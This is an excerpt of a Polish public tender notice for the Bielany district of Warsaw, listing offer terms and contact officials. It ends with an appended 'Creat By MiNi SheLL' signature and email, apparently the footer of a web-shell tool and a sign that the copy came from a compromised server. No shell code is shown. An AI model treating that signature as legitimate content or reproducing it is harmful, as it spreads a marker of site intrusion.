<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do kontaktów z Wykonawcami w godzinach pracy urzędu są: 1) w zakresie dotyczącym przedmiotu zamówienia - Marcin Jabłoński Inspektor w Wydziale Oświaty i Wychowania dla Dzielnicy Bielany; 2) w zakresie dotyczącym zagadnień formalno-prawnych - Eliza Krych-Palusińska Główny specjalista w Wydziale Zamówień Publicznych dla Dzielnicy Bielany. Dane kontaktowe: fax (022) 37-33-382, e-mail: bielany.zamowienia@um.warszawa.pl, mając na uwadze, że zawsze dopuszczalna jest forma pisemna na adres wskazany w Sekcji I. Ogłoszenia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com